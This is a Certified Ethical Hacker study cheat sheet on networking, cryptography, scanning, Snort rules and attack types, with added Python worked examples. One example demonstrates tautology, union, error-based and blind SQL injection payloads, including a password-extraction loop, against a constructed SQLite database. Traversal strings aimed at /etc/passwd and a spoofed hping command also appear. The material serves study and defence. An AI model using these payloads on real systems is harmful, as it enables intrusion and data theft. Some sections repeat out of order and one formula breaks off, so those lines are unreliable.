Basics

PKI trust models
  Single Authority: CA at the top. Trust is based on the CA itself.
  Hierarchical: Root CA at the top; RAs underneath it manage certificates.
  XKMS: XML Key Management Specification (XML-based PKI system).

5 phases of a penetration test
  1. Reconnaissance
  2. Scanning & Enumeration
  3. Gaining Access
  4. Maintaining Access
  5. Covering Tracks

TCP flags
  SYN: Initial communication; carries connection parameters and the initial sequence number.
  PSH: Forces delivery to the application without regard for buffering.
  RST: Forces termination of communications in both directions.
  FIN: Ordered close of communications.

Attack Types
  OS: Attacks targeting default OS settings.
  App level: Attacks against application code.
  Shrink Wrap: Attacks using off-the-shelf scripts and code.
  Misconfiguration: Systems that are not configured well.

Cryptography Attacks
  Known Plaintext: Search the plaintext for repeatable sequences and compare them with the encrypted versions.
  Ciphertext-only: Obtain several messages encrypted with the same algorithm and analyze them to reveal repeating patterns.
  Replay: Performed from a MITM position. Repeat a legitimate exchange to fool the system into setting up a communications channel.

DHCP (DORA)
  Client --Discover--> Server
  Client <--Offer----- Server
  Client --Request---> Server
  Client <--ACK------- Server
  The leased IP is removed from the pool.

Legal
  18 U.S.C. 1029 & 1030
  RFC 1918 - Private IP address standard
  RFC 3227 - Collecting and storing (evidence) data
  ISO 27002 - InfoSec guidelines
  CAN-SPAM - Email marketing
  SPY-Act - License enforcement
  DMCA - Intellectual property
  SOX - Corporate finance processes
  GLBA - Personal finance data
  FERPA - Education records
  FISMA - Government network security standard
  CVSS - Common Vulnerability Scoring System
  CVE - Common Vulnerabilities and Exposures

Digital Certificate
  Used to verify user identity; provides nonrepudiation.
  Version: Identifies the certificate format. Common = X.509 v3.
  Serial: Uniquely identifies the certificate.
  Subject: Whoever/whatever is being identified by the certificate.
  Algorithm ID: Algorithm used to sign the certificate.
  Issuer: Entity that verifies the authenticity of the certificate.
  Valid from/to: Dates the certificate is good for.
  Key usage: Shows for what purpose the certificate was made.
  Subject's public key: Self-explanatory.
  Optional fields: e.g., Issuer ID, Subject Alternative Name...

Scanning & Enumeration

ICMP Message Types
  0: Echo Reply: Answer to a type 8 Echo Request.
  3: Destination Unreachable: No host/network. Codes:
     0 - Destination network unreachable
     1 - Destination host unreachable
     6 - Network unknown
     7 - Host unknown
     9 - Network administratively prohibited
     10 - Host administratively prohibited
     13 - Communication administratively prohibited
  4: Source Quench: Congestion control message.
  5: Redirect: Sent when 2+ gateways are available and a better route exists than the configured default gateway. Codes:
     0 - Redirect datagram for the network
     1 - Redirect datagram for the host
  8: Echo Request: Ping message requesting an echo.
  11: Time Exceeded: TTL expired before the packet could be routed to its destination.

[Figure: Regional Registry Coverage Map]
Reconnaissance

Definition
  Gathering information on targets, whereas footprinting is mapping out at a high level. The terms are used interchangeably in C|EH.

Google Hacking
  Operator: keyword followed by additional search terms.
  site: Search only within a domain
  ext: File extension
  loc: Maps location
  intitle: Keywords in the title tag of the page
  allintitle: All of the keywords must be in the title
  inurl: Keywords anywhere in the URL
  allinurl: All of the keywords must be in the URL
  cache: Search the Google cache only

CIDR
  Method of representing IPv4 addresses together with their network mask.
  /30 = 4 addresses, mask 255.255.255.252
  /28 = 16 addresses, mask 255.255.255.240
  /26 = 64 addresses, mask 255.255.255.192
  /24 = 256 addresses, mask 255.255.255.0
  /22 = 1024 addresses, mask 255.255.252.0
  /20 = 4096 addresses, mask 255.255.240.0

DNS
  Port 53. nslookup queries use UDP; zone transfers use TCP.
  DNS record types
    Service (SRV): Hostname and port number of servers providing a service
    Start of Authority (SOA): Primary name server for the zone
    Pointer (PTR): IP to hostname; used for reverse DNS
    Name Server (NS): Name servers for the namespace
    Mail Exchange (MX): E-mail servers
    CNAME: Aliases in the zone; lets one host list multiple services in DNS
    Address (A): Hostname to IP; used for forward DNS lookup
  DNS footprinting: whois, nslookup, dig

Port Numbers
  0 - 1023: Well-known
  1024 - 49151: Registered
  49152 - 65535: Dynamic

Important Port Numbers
  FTP: 20/21
  SSH: 22
  Telnet: 23
  SMTP: 25
  WINS: 42
  TACACS: 49
  DNS: 53
  HTTP: 80 / 8080
  Kerberos: 88
  POP3: 110
  Portmapper (Linux): 111
  NNTP: 119
  NTP: 123
  RPC-DCOM: 135
  NetBIOS/SMB: 137-139
  IMAP: 143
  SNMP: 161/162
  LDAP: 389
  HTTPS: 443
  CIFS: 445
  RADIUS: 1812
  RDP: 3389

Cryptography

Symmetric Encryption
  One shared key between the parties. Key pairs required =

Symmetric Algorithms
  DES: 56-bit key (plus 8 parity bits); fixed 64-bit block
  3DES: 168-bit key; up to 3 keys
  AES: 128, 192, or 256-bit keys; replaced DES
  IDEA: 128-bit key
  Twofish: Block cipher, key size up to 256 bits
  Blowfish: Replaced by AES; 64-bit block
  RC: Includes RC2 through RC6. RC5 keys up to 2,040 bits; RC6 uses a 128-bit block

Asymmetric Encryption
  Public key encrypts, private key decrypts (for confidentiality; a signature is made with the private key and verified with the public key).

Asymmetric Algorithms
  Diffie-Hellman: Key exchange; used in SSL/IPsec
  ECC: Elliptic curve. Low processing power; suited to mobile devices
  ElGamal: Not based on prime factoring; relies on the discrete logarithm problem to encrypt/sign
  RSA: Product of 2 large primes; keys up to 4,096 bits. Modern standard

Hash Algorithms
  MD5: 128-bit hash, expressed as 32 hex characters
  SHA-1: 160-bit hash; historically required for use in US government applications
  SHA-2: 4 separate hashes of 224, 256, 384, and 512 bits

Trust Models
  Web of trust: Entities sign certificates for each other

TCP Header Flags
  URG: Indicates data being sent out of band
  ACK: Acknowledges the SYN and every segment after it

NetBIOS (nbtstat)
  nbtstat -R: Purge and reload the remote name cache
  nbtstat -S 10: Display the session table, refreshing every 10 seconds
  NetBIOS suffixes
    1B == domain master browser
    1C == domain controller
    1D == master browser for the subnet

Password Attacks
  Offline: Steal a copy of the password store; cracking efforts run on a separate system
  Non-electronic: Social engineering

Sidejacking
  Steal cookies exchanged between systems and use them to perform a replay-style attack.

Authentication Types
  Type 1: Something you know
  Type 2: Something you have
  Type 3: Something you are

SNMP
  Uses a community string as the password. SNMPv3 encrypts the community strings.

Session Hijacking
  Refers to the active attempt to steal an entire established session from a target.
  1. Sniff traffic between client and server
  2. Monitor traffic and predict sequence numbers
  3. Desynchronise the session with the client
  4. Predict the session token and take over the session
  5. Inject packets to the target server

Sniffing and Evasion

IPv4 and IPv6
  IPv4 == unicast, multicast, and broadcast
  IPv6 == unicast, multicast, and anycast
  IPv6 unicast and multicast scope includes link local, site local, and global.
Important Port Numbers (continued)
  Printer: 515, 631, 9100
  IRC: 6667
  Tini: 7777
  NetBus: 12345
  Sub7: 27374
  Back Orifice: 31337

MAC Address
  First half = 3 bytes (24 bits) = Organizationally Unique Identifier (OUI)
  Second half = unique number assigned by the vendor

NAT (Network Address Translation)
  Basic NAT is a one-to-one mapping where each internal IP == a unique public IP.
  NAT overload (PAT) == port address translation. Typically used as it is the cheaper option.

Stateful Inspection
  Concerned with connections. Doesn't sniff every packet; it just verifies whether the packet belongs to a known connection, then passes it along.

HTTP Tunnelling
  Crafting of wrapped segments through a port rarely filtered by the firewall (e.g., 80) to carry payloads that may otherwise be blocked.

HTTP Error Codes
  200 series - OK
  400 series - Could not fulfil the request (client error)
  500 series - Could not process the request (server error)

Kerberos
  Makes use of symmetric and asymmetric encryption technologies and involves:
  KDC: Key Distribution Centre
  AS: Authentication Service
  TGS: Ticket Granting Service
  TGT: Ticket Granting Ticket
  Process
  1. Client asks the KDC (which hosts the AS and TGS) for a ticket to authenticate throughout the network. This request is in clear text.
  2. The AS responds with a TGT, encrypted with a key derived from the user's password hash kept on the AD server.
  3. If the client can decrypt it, it sends the TGT back to the TGS requesting a service ticket.
  4. The TGS responds with the service ticket, and the client can log on and access network resources.

SAM file
  C:\Windows\system32\config

Registry
  2 elements make a registry setting: a key (location pointer) and a value (defines the key's setting).
  Root level keys are as follows:
  HKEY_LOCAL_MACHINE - Info on hardware/software
  HKEY_CLASSES_ROOT - Info on file associations and Object Linking and Embedding (OLE) classes
  HKEY_CURRENT_USER - Profile info on the current user
  HKEY_USERS - User config info for all active users
  HKEY_CURRENT_CONFIG - Pointer to \Hardware Profiles\
  Autostart locations under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion:
    \RunServicesOnce
    \RunServices
    \RunOnce
    \Run

Nmap
  Nmap is the de-facto tool for this pen-test phase.
  nmap <scan options> <target>
  -sA: ACK scan            -sF: FIN scan
  -sS: SYN (stealth) scan  -sT: TCP connect scan
  -sI: Idle scan           -sn: Ping sweep (no port scan)
  -sN: NULL scan           -sX: XMAS tree scan
  -sR: RPC scan            -sW: Window scan
  -Pn: No ping (older syntax: -P0)
  -PE: ICMP echo ping (older: -PI)
  -PS: SYN ping            -PA: TCP ACK ping (older: -PT)
  -oN: Normal output       -oX: XML output
  -A: OS/version detection and scripts
  -T<0-5>: Timing, slow (0) to fast (5)

Scan Types
  TCP connect: Full 3-way handshake on all ports. Open = SYN/ACK, Closed = RST/ACK
  SYN: SYN packets to ports (incomplete handshake). Open = SYN/ACK, Closed = RST/ACK
  FIN: Packet with the FIN flag set. Open = no response, Closed = RST
  XMAS: Multiple flags set (FIN, URG, and PSH). Binary header: 00101001. Open = no response, Closed = RST
  ACK: Maps firewall rules rather than port state. Unfiltered = RST, Filtered = no response
  IDLE: Spoofed IP, SYN flag; designed for stealth. Open = SYN/ACK, Closed = RST/ACK
  NULL: No flags set. Responses vary by OS. NULL scans are designed for Linux/Unix machines.
  FIN, XMAS and NULL scans rely on RFC 793 behaviour; Windows replies RST regardless of port state.

Snort IDS
  It has 3 modes: Sniffer / Packet logger / Network IDS.
  Config file: /etc/snort, or c:\snort\etc
  alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-Back-orifice";)
  Any packet from any address not in the home network, using any source port, destined for an address in the home network on port 31337, sends the msg.
  Span port: port mirroring
  False Negative: IDS incorrectly reports the stream as clean

IDS Evasion Tactics
  Slow down OR flood the network (and sneak through in the mix) OR use fragmentation.

TCPdump syntax
  tcpdump <flag(s)> <interface>

Attacking a System

C|EH rules for passwords
  Must not contain the user's name. Minimum 8 characters. 3 of 4 complexity components, e.g., special character, number, uppercase, lowercase.

Social Engineering
  Human-based attacks
    Dumpster diving
    Impersonation
    Technical support
    Shoulder surfing
    Tailgating / piggybacking
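Worked example (added here; not part of the StationX sheet): the scan types above are defined by which TCP flag bits a probe carries and by what reply a port gives. The Python below decodes the flags byte of a raw TCP header, classifies a probe as NULL/FIN/XMAS/SYN/ACK, and turns a single reply into the verdict a scanner can honestly report, including the RFC 793 caveat that silence on a FIN/NULL/XMAS probe is "open|filtered", not "open". The sample header, ports and sequence numbers are constructed for the example.

```python
import struct

# TCP flag bits in the low 6 bits of the flags byte (TCP header offset 13).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = ((FIN, "FIN"), (SYN, "SYN"), (RST, "RST"), (PSH, "PSH"), (ACK, "ACK"), (URG, "URG"))

# Probe flag combinations and the scan type that sends them.
PROBES = {0: "NULL", FIN: "FIN", FIN | PSH | URG: "XMAS", SYN: "SYN", ACK: "ACK"}


def decode_flags(flag_byte):
    """Names of the flag bits set in a TCP flags byte, low bit first."""
    return [name for bit, name in FLAG_NAMES if flag_byte & bit]


def classify_probe(flag_byte):
    """Map an inbound probe's flag combination to the scan type it belongs to."""
    return PROBES.get(flag_byte & 0x3F, "other")


def flags_from_tcp_header(header):
    """Extract the flags byte from a raw TCP header (20 bytes minimum, options excluded)."""
    if len(header) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    return header[13]


def infer_port_state(scan, reply):
    """Interpret one reply ("SYN/ACK", "RST" or None for silence) according to the scan table.

    Unix-like stacks follow RFC 793: closed ports answer FIN/NULL/XMAS probes with RST and
    open ports stay silent, but silence also means "filtered", so the honest verdict is
    "open|filtered". Windows answers RST for every FIN/NULL/XMAS probe, so those scans say
    nothing there; SYN scans work everywhere. ACK scans map firewall rules, not port state.
    """
    if scan == "SYN":
        return {"SYN/ACK": "open", "RST": "closed"}.get(reply, "filtered")
    if scan in ("FIN", "NULL", "XMAS"):
        return "closed" if reply == "RST" else "open|filtered"
    if scan == "ACK":
        return "unfiltered" if reply == "RST" else "filtered"
    raise ValueError("unknown scan type: %s" % scan)


def build_tcp_header(sport, dport, flag_byte):
    """Constructed sample: a minimal 20-byte TCP header carrying the given flags (seq/ack zero)."""
    data_offset = 5 << 4  # 5 x 32-bit words, no options, reserved bits zero
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, data_offset, flag_byte, 1024, 0, 0)


if __name__ == "__main__":
    probe = build_tcp_header(40000, 31337, 0b00101001)  # the XMAS "Binary Header" from the sheet
    flag_byte = flags_from_tcp_header(probe)
    print(decode_flags(flag_byte), classify_probe(flag_byte))
    print(infer_port_state("XMAS", None), infer_port_state("XMAS", "RST"))
```

Feed `flags_from_tcp_header` the TCP portion of a captured packet (after the IP header) and `classify_probe` tells you which nmap scan type the sender is running; a run of XMAS or NULL probes across many ports from one source is the detection signal an IDS keys on.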
LM Hashing
  Passwords are split into two 7-character halves; an empty half (7 spaces of padding) hashes to AAD3B435B51404EE.

NetBIOS (nbtstat)
  nbtstat -a COMPUTER: Remote name table by computer name
  nbtstat -A 192.168.10.12: Remote name table by IP address
  nbtstat -n: Local name table
  nbtstat -c: Local name cache

Password Attack Types
  Passive Online: Sniffing the wire, intercepting cleartext passwords / replay / MITM
  Active Online: Password guessing
  Offline: Steal a copy of the password store, i.e., the SAM
  Non-electronic: Social engineering

Social Engineering (continued)
  Computer-based attacks
    Phishing - Email scam
    Whaling - Targeting CEOs
    Pharming - Evil-twin website
  Types of Social Engineers
    Insider Associates: Limited authorized access
    Insider Affiliates: Insiders by virtue of affiliation that spoof the identity of the insider
    Outsider Affiliates: Non-trusted outsiders that use an access point that was left open

Physical Security
  3 major categories of physical security measures:
  Physical measures: Things you can taste, touch, smell
  Technical measures: Smart cards, biometrics
  Operational measures: Policies and procedures

Wireless
  Spec      Distance  Speed       Frequency
  802.11a   30m       54 Mbps     5 GHz
  802.11b   100m      11 Mbps     2.4 GHz
  802.11g   100m      54 Mbps     2.4 GHz
  802.11n   125m      100 Mbps+   2.4/5 GHz

Bluetooth Attacks
  Bluesmacking: DoS against a device
  Bluejacking: Sending messages to/from devices
  Bluesniffing: Sniffs for Bluetooth
  Bluesnarfing: Actual theft of data from a device

Notable Vulnerabilities and Malware
  Shellshock: CVE-2014-6271. Bash executes code placed after a function definition in an environment variable, where the text should only be stored, not executed.
  ILOVEYOU: A worm originating in the Philippines. Started on May 5, 2000; written in VBScript and spread as an e-mail attachment.
  MELISSA: E-mail virus based on an MS Word macro. Created in 1999 by David L. Smith.

Linux Commands

Linux File System
  / - Root
  /var - Variable data / log files
  /bin - Binaries / user commands
  /sbin - System binaries / admin commands

Trojans and Other Attacks

Virus Types
  Boot: Moves the boot sector to another location. Almost impossible to remove.
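Worked example (added here; not the sheet's own code): the C|EH password rules above, turned into a check that reports every violation rather than a single pass/fail. The inputs are constructed; the reversed-username rejection goes slightly beyond the rule as stated and is labelled as such in the code.

```python
import string

MIN_LENGTH = 8
REQUIRED_CLASSES = 3  # of the 4 complexity components below

# The four complexity components named in the C|EH rule.
CLASSES = {
    "uppercase": set(string.ascii_uppercase),
    "lowercase": set(string.ascii_lowercase),
    "number": set(string.digits),
    "special": set(string.punctuation),
}


def classes_present(password):
    """Which of the four complexity components the password contains (sorted by name)."""
    chars = set(password)
    return sorted(name for name, members in CLASSES.items() if chars & members)


def check_password(password, username):
    """Return the list of C|EH rule violations; an empty list means the password is acceptable.

    The username check is case-insensitive and also rejects the reversed name, which the rule
    does not spell out; that extra check is an addition made for this example.
    """
    violations = []
    if len(password) < MIN_LENGTH:
        violations.append("shorter than %d characters" % MIN_LENGTH)
    found = classes_present(password)
    if len(found) < REQUIRED_CLASSES:
        violations.append("only %d of 4 complexity components: %s"
                          % (len(found), ", ".join(found) or "none"))
    lowered = password.lower()
    name = username.lower()
    if name and (name in lowered or name[::-1] in lowered):
        violations.append("contains the user's name")
    return violations


if __name__ == "__main__":
    # Constructed sample inputs.
    for pw in ("Summer2024!", "password", "jdoe!Pass1", "Ab1!"):
        print("%-12s -> %s" % (pw, check_password(pw, "jdoe") or "OK"))
```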
Linux File System (continued)
  /root - Home directory for the root user
  /boot - Stores the kernel
  /proc - Direct access to kernel data
  /dev - Hardware storage devices
  /mnt - Mounted devices

Identifying Users and Processes
  INIT process: PID 1
  Root: UID, GID 0
  Service accounts: 1-999
  All other users: 1000 and above

Permissions
  4 - Read
  2 - Write
  1 - Execute
  Order: User/Group/Others
  764 - User > RWX, Group > RW, Other > R

Web-based Hacking
  CSRF - Cross Site Request Forgery
  Dot-dot-slash (directory traversal) attack: Variant of a Unicode or un-validated input attack.
  SQL Injection attack types
    Union Query: Use the UNION operator to return the union of the target table with a crafted query against another table.
    Tautology: Inject a condition that is always true (e.g., OR 1=1) so the database evaluates the statement as true for every row.
    Blind SQL Injection: Trial and error with no error responses or prompts; only yes/no behaviour to go on.
    Error-based SQL Injection: Enumeration technique. Inject poorly constructed commands to make the database respond with error messages containing table names and other information.

Virus Types (continued)
  Camo: Disguised as legitimate files.
  Cavity: Hides in empty areas of an executable.
  Macro: Written in MS Office macro language.
  Multipartite: Attempts to infect files and the boot sector at the same time.
  Metamorphic: Rewrites itself when it infects a new file.
  Network: Spreads via network shares.
  Polymorphic: Encrypts itself using a built-in polymorphic engine. The constantly changing signature makes it hard to detect.
  Shell: Like a boot-sector virus but wrapped around application code, running on application start.
  Stealth: Hides in files, copies itself to deliver its payload.

Snort rule syntax
  action protocol address port -> address port (option:value; option:value;)
  alert tcp 10.0.0.1 25 -> 10.0.0.2 25 (msg:"Sample Alert"; sid:1000;)

DoS Types
  SYN Attack: Send thousands of SYN packets with a false IP address. The target will attempt a SYN/ACK response; all machine resources will be engaged.

Buffer Overflow
  A condition that occurs when more data is written to a buffer than it has space to store, resulting in data corruption. Caused by insufficient bounds checking, a bug, or poor configuration in the program code.
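Worked example (added here; not the sheet's own code): the dot-dot-slash attack above and its Unicode and double-encoded variants, against the check a web server should apply before opening a file. The web root `/srv/www/public` and the sample requests are constructed for the example; the code decodes percent-encoding until it stops changing, rejects overlong UTF-8 such as `%c0%af`, and then verifies the normalized path is still under the root.

```python
import os
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/srv/www/public"  # assumption: the directory the application is meant to serve from


def decode_fully(user_path, rounds=3):
    """Undo percent-encoding until it stops changing, then decode as strict UTF-8.

    Repeating the decode catches double encoding (%252e%252e%2f); strict UTF-8 rejects
    overlong sequences such as %c0%af, the classic Unicode disguise for '/'.
    """
    raw = user_path.encode("utf-8")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw.decode("utf-8")  # raises UnicodeDecodeError on overlong/invalid bytes


def resolve_request_path(user_path, root=WEB_ROOT):
    """Map a requested path onto the web root, or raise ValueError if it would escape it."""
    try:
        decoded = decode_fully(user_path)
    except UnicodeDecodeError:
        raise ValueError("invalid or overlong UTF-8 in path")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")  # backslash variant aimed at Windows servers
    candidate = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the web root")
    return candidate


def is_safe(user_path, root=WEB_ROOT):
    """Convenience wrapper: True if the path resolves inside root."""
    try:
        resolve_request_path(user_path, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample requests: benign paths and the dot-dot-slash variants.
    for p in ("images/logo.png", "/images/../index.html", "../../etc/passwd",
              "%2e%2e/%2e%2e/etc/passwd", "%252e%252e%2fetc%2fpasswd",
              "..%c0%af..%c0%afetc/passwd", "..\\..\\windows\\win.ini"):
        print("%-32s %s" % (p, "OK" if is_safe(p) else "BLOCKED"))
```

The check is done on the normalized absolute path, not by searching the input for `../`: a blacklist of strings is exactly what the encoded variants are built to slip past.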
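Worked example (added here; not the sheet's own code) for the four SQL injection types listed above, run against an in-memory SQLite database constructed for the purpose. The vulnerable search splices input into the query; the hardened version binds it as a parameter. The tautology, union and error payloads are shown directly, and the blind case is carried through as the character-by-character extraction loop an attacker actually runs.

```python
import sqlite3
import string


def make_db():
    """Constructed sample database: a product catalogue plus a users table the app never means to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def search_vulnerable(conn, term):
    """The 'before' code: user input is spliced straight into the SQL string."""
    sql = "SELECT name, price FROM products WHERE name = '%s'" % term
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "ERROR: %s" % exc  # error-based injection lives on messages like this one


def search_safe(conn, term):
    """The hardened form: a bound parameter, so input can never change the query's structure."""
    return conn.execute("SELECT name, price FROM products WHERE name = ?", (term,)).fetchall()


TAUTOLOGY = "x' OR '1'='1"
UNION = "x' UNION SELECT username, password FROM users--"
BROKEN = "'"  # unbalanced quote: makes the database talk back with an error message


def blind_extract(conn, subquery, max_len=16, alphabet=string.ascii_lowercase + string.digits):
    """Blind (boolean) injection: recover a secret one character at a time from yes/no answers.

    Each probe asks 'is character N of the secret equal to X?'; a non-empty result means yes.
    Nothing from the users table is ever displayed, which is what makes the attack 'blind'.
    """
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = "x' OR substr((%s),%d,1)='%s" % (subquery, pos, ch)
            rows = search_vulnerable(conn, payload)
            if isinstance(rows, list) and rows:
                found += ch
                break
        else:
            break  # no candidate matched: we have run off the end of the secret
    return found


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, TAUTOLOGY))  # every product: the WHERE clause is always true
    print(search_vulnerable(db, UNION))      # ('admin', 's3cret') leaks through the products query
    print(search_vulnerable(db, BROKEN))     # ERROR: ... unrecognized token
    print(blind_extract(db, "SELECT password FROM users WHERE username='admin'"))
    print(search_safe(db, TAUTOLOGY))        # []: the payload is just a product name that does not exist
```

The union payload only works because the attacker matched the column count (two) of the original SELECT; error-based probing is how that count, and the table names, are usually discovered first.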
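Worked example (added here; not the sheet's or the Snort project's code): a small parser and matcher for the rule header format above, `action protocol address port -> address port (option:value; ...)`. It understands `any`, `$VAR` variables, `!` negation, CIDR blocks and port ranges, and runs both of the sheet's rules over constructed sample traffic. The `HOME_NET` value is an assumption standing in for what snort.conf would define, the Back Orifice rule is given a `sid` (assumed) because Snort requires one, and payload options such as `content:` are out of scope.

```python
import ipaddress
import re

# Assumption: HOME_NET as it would be defined in snort.conf; it is not on the sheet.
VARIABLES = {"HOME_NET": "10.0.0.0/8", "EXTERNAL_NET": "any"}

HEADER_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$"
)
OPTION_RE = re.compile(r'(\w+)\s*:\s*("(?:[^"\\]|\\.)*"|[^;]*?)\s*;')


def _split_negation(spec):
    return (True, spec[1:]) if spec.startswith("!") else (False, spec)


def _expand(spec):
    return VARIABLES[spec[1:]] if spec.startswith("$") else spec


def match_address(spec, ip):
    """Does an address field (any, $VAR, !$VAR, CIDR, [a,b] list) match this IP?"""
    negated, spec = _split_negation(spec)
    spec = _expand(spec)
    if spec == "any":
        hit = True
    else:
        nets = [ipaddress.ip_network(s, strict=False) for s in spec.strip("[]").split(",")]
        hit = any(ipaddress.ip_address(ip) in net for net in nets)
    return hit != negated


def match_port(spec, port):
    """Does a port field (any, N, lo:hi, :hi, lo:, with optional !) match this port?"""
    negated, spec = _split_negation(spec)
    if spec == "any":
        hit = True
    elif ":" in spec:
        lo, hi = spec.split(":", 1)
        hit = (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    else:
        hit = port == int(spec)
    return hit != negated


def parse_rule(text):
    """Split 'action proto src sport -> dst dport (opt:val; ...)' into its fields."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a Snort rule: %r" % text)
    action, proto, src, sport, direction, dst, dport, body = m.groups()
    options = {k: v.strip('"') for k, v in OPTION_RE.findall(body)}
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "dir": direction, "dst": dst, "dport": dport, "options": options}


def rule_matches(rule, pkt):
    """Header match only; payload options such as content: are not evaluated here."""
    if rule["proto"] not in ("ip", pkt["proto"]):
        return False

    def one_way(src, sport, dst, dport):
        return (match_address(rule["src"], src) and match_port(rule["sport"], sport)
                and match_address(rule["dst"], dst) and match_port(rule["dport"], dport))

    if one_way(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"]):
        return True
    return rule["dir"] == "<>" and one_way(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])


def run_rules(rules, packets):
    """Return (sid, msg, src, dst) for every packet/rule pair that fires."""
    return [(r["options"].get("sid"), r["options"].get("msg"), p["src"], p["dst"])
            for p in packets for r in rules if rule_matches(r, p)]


# The sheet's two rules; the Back Orifice rule is given a sid here (assumption) since Snort needs one.
RULES = [parse_rule(t) for t in (
    'alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-Back-orifice"; sid:1001;)',
    'alert tcp 10.0.0.1 25 -> 10.0.0.2 25 (msg:"Sample Alert"; sid:1000;)',
)]

# Constructed sample traffic: an external probe of port 31337, an internal connection to the
# same port (must not fire because of the !$HOME_NET negation), and an SMTP segment for the sample rule.
PACKETS = [
    {"proto": "tcp", "src": "203.0.113.5", "sport": 4444, "dst": "10.0.0.7", "dport": 31337},
    {"proto": "tcp", "src": "10.0.0.9", "sport": 4444, "dst": "10.0.0.7", "dport": 31337},
    {"proto": "tcp", "src": "10.0.0.1", "sport": 25, "dst": "10.0.0.2", "dport": 25},
]

if __name__ == "__main__":
    for alert in run_rules(RULES, PACKETS):
        print(alert)
```

The second packet is the one worth noticing: an internal host talking to 31337 is exactly what the `!$HOME_NET` source field excludes, so a rule written this way is blind to a compromised machine inside the network.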
Buffer Overflow Types
  Stack: Premise is that all program calls are kept on a stack and performed in order. Try to change a function pointer or variable to allow code execution.
  Heap: Takes advantage of memory "on top of" the application (dynamically allocated). Use the program to overwrite function pointers.
  NOP Sled: Takes advantage of the instruction called "no-op". Sends a large number of NOP instructions into the buffer. Most IDS detect this attack.

Dangerous C functions
  The following do not check the size of the destination buffer: gets(), strcpy(), strcat(). printf() with an attacker-controlled format string is a related hazard.

DoS Types (continued)
  SYN Flood: Send thousands of SYN packets but never respond to any of the returned SYN/ACK packets. The target will run out of available connections.
  ICMP Flood: Send ICMP Echo packets with a fake source address. The target attempts to respond but reaches a limit of packets sent per second.
  Application level: Send more "legitimate" traffic to a web application than it can handle.
  Smurf: Send a large number of pings to the broadcast address of the subnet with the source IP spoofed to the target. The subnet will send ping responses to the target.
  Fraggle Attack: Similar to Smurf but uses UDP.
  Ping of Death: Attacker fragments an ICMP message to send to the target. When the fragments are reassembled, the resultant ICMP packet is larger than the max size and crashes the system.

Command Line Tools
  NMap:     nmap -sT -T5 -n -p 1-100 10.0.0.1
  Netcat:   nc -v -z -w 2 10.0.0.1
  TCPdump:  tcpdump -i eth0 -v -X ip proto 1
  Snort:    snort -vde -c my.rules
  hping:    hping3 -I eth0 -c 10 -a 2.2.2.2 -t 100 10.0.0.1
  iptables: iptables -A FORWARD -j ACCEPT -p tcp --dport 80

Tools of the Trade

Vulnerability Research
  National Vulnerability Database, Eccouncil.org, Exploit-db

Foot-printing
  Website Research Tools: Netcraft, Webmaster

Wireless Network Hacking

Wireless sniffing
  A compatible wireless adapter with promiscuous (monitor) mode is required, but otherwise it is pretty much the same as sniffing wired networks.
Notable Vulnerabilities (continued)
  Heartbleed: CVE-2014-0160. Found by Neel Mehta; a vulnerability in the heartbeat extension of the OpenSSL software library. Allowed an attacker to read server memory and steal information protected under normal conditions by SSL/TLS encryption.
  POODLE: CVE-2014-3566. MITM exploit which took advantage of internet and software clients falling back to SSL 3.0.

802.11 Security Specifications
  WEP: RC4 with a 24-bit IV. Keys are 40 or 104 bits.
  WPA: RC4 with longer keys; 48-bit IV.
  WPA/TKIP: Changes the IV each frame and uses key mixing.
  WPA2: AES (CCMP) plus TKIP-style features; 48-bit IV.

Foot-printing (continued)
  Website Research Tools: Archive
  Website Mirroring: Wget, Archive, GoogleCache
  DNS and Whois Tools: Nslookup, Sam Spade, ARIN, WhereisIP, DNSstuff, DNS-Digger

Scanning and Enumeration
  Ping Sweep: Angry IP Scanner, MegaPing
  Scanning Tools: SuperScan, NMap (Zenmap), NetScan Tools Pro, Hping, Netcat
  War Dialing: THC-Scan, TeleSweep, ToneLoc, WarVox
  Banner Grabbing: Telnet, ID Serve, Netcraft, Xprobe
  Vulnerability Scanning: Nessus, SAINT, Retina, Core Impact, Nikto
  Network Mapping: NetMapper, LANState, IPSonar
  Proxy, Anonymizer, and Tunneling: Tor, ProxySwitcher, ProxyChains, SoftCab, HTTP Tunnel, Anonymouse

Enumeration
  SuperScan, User2Sid/Sid2User, LDAP Admin, Xprobe, Hyena
  SNMP Enumeration: SolarWinds, SNMPUtil, SNMPScanner

System Hacking Tools
  Password Hacking: Cain, John the Ripper, LCP, THC-Hydra, ElcomSoft, Aircrack, Rainbow Crack, Brutus, KerbCrack
  Privilege Escalation: Password Recovery Boot Disk, Password Reset, Password Recovery, System Recovery
  Executing Applications: PDQ Deploy, RemoteExec, Dameware
